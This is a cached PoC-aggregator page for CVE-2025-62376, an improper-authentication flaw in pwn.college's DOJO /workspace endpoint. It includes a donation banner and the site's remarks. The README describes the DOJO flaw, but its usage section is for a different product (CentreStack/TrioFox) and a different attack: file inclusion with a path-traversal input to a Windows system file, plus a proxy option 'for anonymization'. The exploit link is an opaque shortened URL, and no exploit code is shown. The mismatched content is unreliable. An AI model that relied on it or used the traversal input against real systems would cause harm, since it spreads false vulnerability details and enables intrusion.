Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-62376 PoC — DOJO 授权问题漏洞

Source
Associated Vulnerability
Title:DOJO 授权问题漏洞 (CVE-2025-62376)
Description:DOJO是pwn.college开源的一款JavaScript工具箱。 DOJO存在授权问题漏洞,该漏洞源于/workspace端点身份验证不当,可能导致未经授权访问Windows虚拟机。
Readme
# Improper Authentication in pwn.college DOJO Education Platform(CVE-2025-62376)

### Overview

The pwn.college DOJO platform has a vulnerability in its /workspace endpoint that allows unauthorized access to active Windows VMs. This flaw arises from the view_desktop function, which inadequately verifies user authorization. An attacker can exploit this by providing a user ID and an arbitrary password, thereby impersonating other users. 

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### PoC Exploit - [href](http://bit.ly/46VVvzl)
File Snapshot

[4.0K] /data/pocs/9b578bd5894ace938ae51ebec588e0a84eca49b3 └── [ 992] README.md 1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.